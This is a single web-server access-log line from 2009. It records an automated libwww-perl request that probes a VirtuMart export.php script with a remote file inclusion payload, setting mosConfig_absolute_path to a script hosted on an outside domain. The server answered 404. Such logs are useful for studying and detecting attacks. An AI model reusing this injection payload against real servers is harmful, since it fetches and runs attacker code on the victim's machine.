122.201.76.100 - - [08/Jun/2009:01:17:08 -0400] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 254 "-" "libwww-perl/5.811"
